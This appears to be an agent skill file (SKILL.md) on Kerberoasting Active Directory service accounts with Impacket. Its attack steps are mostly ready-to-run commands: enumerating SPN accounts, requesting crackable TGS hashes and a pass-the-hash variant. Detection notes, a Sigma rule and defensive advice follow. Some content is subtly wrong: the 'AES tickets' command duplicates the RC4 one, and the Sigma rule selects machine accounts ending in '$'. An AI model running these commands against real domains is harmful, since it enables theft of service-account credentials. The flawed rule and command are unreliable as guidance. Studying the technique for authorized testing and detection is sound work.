This source did not publish a separate summary. Review SKILL.md before using the skill.
SKILL.md
Exploiting Kerberoasting with Impacket
Overview
Kerberoasting (MITRE ATT&CK T1558.003) is a credential access technique that targets Active Directory service accounts by requesting Kerberos TGS (Ticket Granting Service) tickets for accounts with Service Principal Names (SPNs). The TGS ticket is encrypted with the service account's NTLM hash (RC4 or AES), enabling offline brute-force cracking. Impacket's GetUserSPNs.py is the standard tool for Linux-based Kerberoasting attacks.
When to Use
When performing authorized security testing that involves exploiting kerberoasting with impacket
When analyzing malware samples or attack artifacts in a controlled environment
When conducting red team exercises or penetration testing engagements
When building detection capabilities based on offensive technique understanding
Prerequisites
Valid domain credentials (any domain user can request TGS tickets)
Network access to a Domain Controller (TCP/88 Kerberos, TCP/389 LDAP)
Impacket installed (pip install impacket)
Hashcat or John the Ripper for offline cracking
Wordlist (e.g., rockyou.txt, SecLists)
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
MITRE ATT&CK Mapping
Technique ID
Name
Tactic
T1558.003
Steal or Forge Kerberos Tickets: Kerberoasting
Credential Access
T1087.002
Account Discovery: Domain Account
Discovery
T1110.002
Brute Force: Password Cracking
Credential Access
Step 1: Enumerate Kerberoastable Accounts
# List all user accounts with SPNs (without requesting tickets)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1
# Output example:
# ServicePrincipalName Name MemberOf PasswordLastSet
# ---------------------------- ---------- -------------------------------- -------------------
# MSSQLSvc/SQL01.corp.local svc_sql CN=Domain Admins,CN=Users,... 2023-01-15 10:30:22
# HTTP/web01.corp.local svc_web CN=Web Admins,CN=Users,... 2024-03-20 14:15:00
# HOST/backup01.corp.local svc_backup CN=Backup Operators,CN=Users,... 2022-06-01 08:45:10
Step 2: Request TGS Tickets
# Request TGS tickets for all Kerberoastable accounts
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
# Request ticket for a specific SPN
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request-user svc_sql
# Output format (hashcat-compatible):
# $krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/SQL01.corp.local*$abc123...
# Save to file for cracking
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request -outputfile kerberoast_hashes.txt
# Using NTLM hash instead of password (Pass-the-Hash)
GetUserSPNs.py corp.local/jsmith -hashes :aad3b435b51404eeaad3b435b51404ee \
-dc-ip 10.10.10.1 -request -outputfile hashes.txt
# Request AES tickets (if available)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
-request -outputfile hashes.txt
Event ID 4769 - Kerberos Service Ticket Request
- Monitor for: Encryption type 0x17 (RC4-HMAC) when AES is expected
- Monitor for: Single user requesting many TGS tickets in short period
- Monitor for: Service ticket requests from unusual source IPs
Sigma Rule
title: Potential Kerberoasting Activity
status: stable
logsource:
product: windows
service: security
detection:
selection:
EventID: 4769
TicketEncryptionType: '0x17' # RC4
ServiceName|endswith: '$'
filter:
ServiceName: 'krbtgt'
condition: selection and not filter
level: medium
tags:
- attack.credential_access
- attack.t1558.003
Defensive Recommendations
Use Group Managed Service Accounts (gMSA) - 240-character random passwords, auto-rotated
Set strong passwords (25+ chars) on all service accounts
Enable AES-only encryption - Disable RC4 via GPO
Monitor Event ID 4769 for RC4 TGS requests
Implement Managed Service Accounts where gMSA is not feasible
Regular audits - Run BloodHound to identify Kerberoastable accounts
Protected Users group - Add sensitive service accounts
Honeypot SPNs - Create decoy accounts with SPNs to detect attacks